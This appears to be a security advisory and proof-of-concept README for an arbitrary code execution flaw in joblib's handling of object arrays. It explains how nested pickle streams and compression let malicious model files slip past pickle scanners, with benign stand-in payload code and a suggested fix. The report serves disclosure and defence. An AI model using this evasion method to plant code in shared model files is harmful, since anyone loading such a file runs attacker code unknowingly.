# Joblib Double-Pickle `hasobject` ACE + Scanner Evasion PoC
## Vulnerability Summary

- **Library:** joblib (tested on 1.5.3; affects all versions with `NumpyArrayWrapper`)
- **File:** `joblib/numpy_pickle.py`
- **Method:** `NumpyArrayWrapper.read_array()` (lines 173-175)
- **Severity:** Critical (arbitrary code execution on `joblib.load()`)
- **CWE:** CWE-502 (Deserialization of Untrusted Data)
## Root Cause

When a persisted numpy array has `dtype.hasobject == True` (i.e., it contains Python objects), `NumpyArrayWrapper.read_array()` calls raw `pickle.load()` on the inner data stream:
```python
# joblib/numpy_pickle.py, lines 173-175
def read_array(self, unpickler, ensure_native_byte_order):
    ...
    if self.dtype.hasobject:
        # The array contained Python objects. We need to unpickle the data.
        array = pickle.load(unpickler.file_handle)  # <-- RAW pickle.load!
```
This is distinct from the outer pickle stream, which is processed by `NumpyUnpickler` (joblib's custom unpickler subclass). The inner call uses stdlib `pickle.load()` directly, which executes any `__reduce__`-based payload.
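The danger of a raw `pickle.load()` can be shown with a benign stand-in payload: an object whose `__reduce__` tells pickle to call `eval` (in place of `os.system`) during deserialization. This is a minimal sketch, not the PoC itself:

```python
import pickle

class Payload:
    """Benign stand-in for a malicious payload: __reduce__ instructs
    pickle to call eval("2 + 2") at load time instead of os.system(...)."""
    def __reduce__(self):
        return (eval, ("2 + 2",))

blob = pickle.dumps(Payload())
# Raw pickle.load()/loads() invokes the callable unconditionally:
result = pickle.loads(blob)
print(result)  # -> 4 (the eval ran during deserialization, before any type check)
```

Swap `eval` for `os.system` and the load itself becomes the exploit.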
## Attack Vector: Double-Pickle Structure

A joblib file carrying this attack has two nested pickle streams:

```
[Outer Pickle Stream - parsed by NumpyUnpickler]
  -> NumpyArrayWrapper(dtype=object, hasobject=True)
     -> [Inner Pickle Stream - parsed by raw pickle.load()]
        -> __reduce__ payload (os.system, exec, etc.)
```
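The nested layout boils down to two back-to-back pickle streams read from the same file handle. A minimal sketch of that mechanic, with a plain dict and list standing in for the wrapper and payload:

```python
import io
import pickle

buf = io.BytesIO()
pickle.dump({"wrapper": "outer metadata"}, buf)  # outer stream
pickle.dump(["inner", "payload"], buf)           # inner stream: raw bytes after the outer STOP

buf.seek(0)
outer = pickle.load(buf)  # a scanner that stops after the first stream sees only this
inner = pickle.load(buf)  # joblib's read_array() performs exactly this second load
print(outer, inner)
```

The inner stream is invisible to anything that treats the file as a single pickle.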
## Why This Evades Scanners

- **Structural evasion:** Security scanners (Picklescan, ModelScan, etc.) typically parse the pickle stream looking for dangerous opcodes (`REDUCE`, `GLOBAL`, etc.). They parse the outer pickle structure and see a benign `NumpyArrayWrapper` object. The inner pickle stream containing the actual RCE payload is embedded as raw bytes that are only deserialized at runtime.
- **Compression evasion:** Wrapping the file in zlib/bz2/lzma/xz compression means scanners must first decompress before they can even see the outer pickle structure. Many static analysis tools skip compressed formats or only check known magic bytes.
- **Combined evasion:** Compression + double-pickle means a scanner must decompress, parse the outer pickle, identify the `hasobject` code path, and then parse the inner pickle stream. Most scanners do not implement this level of analysis.
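The structural gap can be demonstrated with the stdlib's `pickletools`: an opcode scanner that only walks the outer stream never encounters the `REDUCE` that fires the payload. A sketch, with a string standing in for the wrapper object:

```python
import pickle
import pickletools

class Evil:
    def __reduce__(self):
        return (eval, ("'code ran'",))

outer = pickle.dumps("NumpyArrayWrapper stand-in")  # what a scanner parses
inner = pickle.dumps(Evil())                        # embedded as opaque bytes

def opcodes(blob):
    """Collect the set of opcode names in one pickle stream."""
    return {op.name for op, _, _ in pickletools.genops(blob)}

print("REDUCE" in opcodes(outer))  # False: the outer stream looks clean
print("REDUCE" in opcodes(inner))  # True: the payload lives in the inner stream
```

A scanner would have to know that the bytes after the wrapper are themselves a pickle stream before it could flag them.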
## Affected Code Path

```
joblib.load(filename)
  -> _unpickle(fobj, ...)
    -> NumpyUnpickler.load()
      -> load_build()  [sees NumpyArrayWrapper on stack]
        -> NumpyArrayWrapper.read(unpickler, ...)
          -> read_array(unpickler, ...)
            -> pickle.load(unpickler.file_handle)  # VULNERABLE - raw pickle!
```
## Reproduction

### Prerequisites

```bash
pip install joblib numpy
```

### Step 1: Generate PoC files

```bash
python create_poc.py
```
This creates:

- `poc_plain.joblib` - uncompressed (double-pickle structure visible)
- `poc_zlib.joblib` - zlib compressed
- `poc_bz2.joblib` - BZ2 compressed
- `poc_lzma.joblib` - LZMA compressed
- `poc_xz.joblib` - XZ compressed
- `benign.joblib` - benign reference file
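The compressed variants rely on the wrapper hiding the pickle protocol marker from magic-byte sniffing. A minimal illustration for the zlib case:

```python
import pickle
import zlib

blob = pickle.dumps({"model": "weights"})
compressed = zlib.compress(blob)

# Protocol-2+ pickles start with b'\x80'; the zlib wrapper replaces that
# leading byte (zlib streams start with 0x78), so a scanner sniffing for
# pickle magic bytes never recognizes the file as a pickle.
print(blob[:1] == b"\x80")        # True
print(compressed[:1] == b"\x80")  # False
assert zlib.decompress(compressed) == blob  # the payload survives intact
```

The same hiding applies to the bz2, lzma, and xz variants, each with its own leading magic.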
### Step 2: Verify exploitation

```bash
python verify_poc.py
```

This loads each PoC file with `joblib.load()` and checks for the `pwned.txt` marker file created by the payload.
### Step 3 (optional): Test scanner evasion

```bash
pip install picklescan
picklescan --path poc_plain.joblib
picklescan --path poc_zlib.joblib
picklescan --path poc_lzma.joblib
```
## Impact

- **Arbitrary Code Execution:** Any user calling `joblib.load()` on an untrusted `.joblib` file is vulnerable.
- **Supply Chain Risk:** Malicious `.joblib` model files can be distributed via model hubs (HuggingFace, etc.) and will execute code when loaded.
- **Scanner Bypass:** The double-pickle structure combined with compression evades current model scanning tools that only analyze the outer pickle structure.
## Suggested Fix

The `read_array()` method should use a restricted unpickler for the inner `pickle.load()` call, or at minimum route it through the same `NumpyUnpickler` class that processes the outer stream. Alternatively, joblib could restrict the classes allowed during deserialization of object arrays.
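The restricted-unpickler approach can be sketched with the standard "restricting globals" pattern from the `pickle` documentation. The allow-list below is purely illustrative, not joblib's actual code; a real patch would need to admit the numpy types that object arrays legitimately contain:

```python
import io
import pickle

# Illustrative allow-list (assumption: a real fix would include numpy types).
_ALLOWED = {("builtins", "list"), ("builtins", "dict"), ("builtins", "set")}

class RestrictedUnpickler(pickle.Unpickler):
    """Refuse to resolve any global outside the allow-list, so a
    __reduce__ payload cannot reach os.system, eval, etc."""
    def find_class(self, module, name):
        if (module, name) in _ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")

def safe_load(file_handle):
    return RestrictedUnpickler(file_handle).load()

# Plain data still loads; a payload needing builtins.eval is refused.
print(safe_load(io.BytesIO(pickle.dumps([1, 2, 3]))))  # -> [1, 2, 3]
```

Note that even a restricted unpickler is only as safe as its allow-list; the more robust fix is to avoid raw pickle for object arrays entirely.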